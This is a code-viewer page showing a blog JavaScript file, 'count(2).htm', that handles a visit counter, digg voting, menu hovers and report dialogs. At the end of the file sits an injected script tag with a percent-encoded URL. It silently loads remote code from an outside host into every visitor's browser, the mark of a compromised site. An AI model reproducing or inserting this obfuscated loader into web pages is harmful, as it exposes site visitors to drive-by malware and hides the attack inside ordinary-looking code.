📄 count(2).htm
字号:
if (chkdiv('site_count')) {document.getElementById('site_count').innerHTML='29064';}
var ShowDigg ;
function diggit(logid){
var Ajax = new oAjax("/blog/ajaxServer.asp?action=digglog&fromurl=",show_returnsave);
var arrKey = new Array("logid","");
var arrValue = new Array(logid,"");
Ajax.Post(arrKey,arrValue);
}
function menuFix(obj) {
var sfEls = document.getElementById("menu_"+obj).getElementsByTagName("li");
for (var i=0; i<sfEls.length; i++) {
sfEls[i].onclick=function() {
this.className+=(this.className.length>0? " ": "") + "sfhover";
}
sfEls[i].onmouseover=function() {
this.className+=(this.className.length>0? " ": "") + "sfhover";
}
sfEls[i].onMouseDown=function() {
this.className+=(this.className.length>0? " ": "") + "sfhover";
}
sfEls[i].onMouseUp=function() {
this.className+=(this.className.length>0? " ": "") + "sfhover";
}
sfEls[i].onmouseout=function() {
this.className=this.className.replace(new RegExp("( ?|^)sfhover\\b"),"");
}
}
}
function report(logid,report_type){
var Ajax = new oAjax("/blog/ajaxServer.asp?action=savereport",show_returnsave);
var arrKey = new Array("logid","report_type");
var arrValue = new Array(logid,report_type);
Ajax.Post(arrKey,arrValue);
}
function show_returnsave(arrobj){
if (arrobj){
if (arrobj.length == 4) {
ShowDigg ='\n<div class="digg_list" style="float: left; display:inline; margin: 0 10px 5px 0; width: 45px; height: 55px; background: url(/blog/Images/digg.gif) no-repeat left top; text-align: center; ">\n <div class="digg_number" style="width:45px;padding: 10px 0 11px 0;font-size:18px;font-weight:600;color:#333;font-family:tahoma,Arial,Helvetica,sans-serif;line-height:1.0;">$diggnum$</div>\n <div class="digg_submit" style=" padding: 3px 0 0 6px;line-height:1.0;letter-spacing: 6px; "><a href="javascript:void(null)" onclick="diggit($logid$);" style="font-size:12px;line-height:1.0;">$showmsg$</a></div>\n</div>\n';
ShowDigg = ShowDigg.replace('$diggnum$',arrobj[3])
ShowDigg = ShowDigg.replace('$logid$',arrobj[2])
ShowDigg = ShowDigg.replace('$showmsg$',arrobj[0])
document.getElementById("ob_logd"+arrobj[2]).innerHTML = ShowDigg;
return false;
}
switch (arrobj[1]){
case '1':
var oDialog = new dialog("/blog/");
oDialog.init();
oDialog.set('src',arrobj[1]);
oDialog.event(arrobj[0],'');
oDialog.button('dialogOk',"");
break;
case '2':
var oDialog = new dialog("/blog/");
oDialog.init();
oDialog.set('src',arrobj[1]);
oDialog.event(arrobj[0],'');
oDialog.button('dialogOk',"");
break;
}
}
}
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -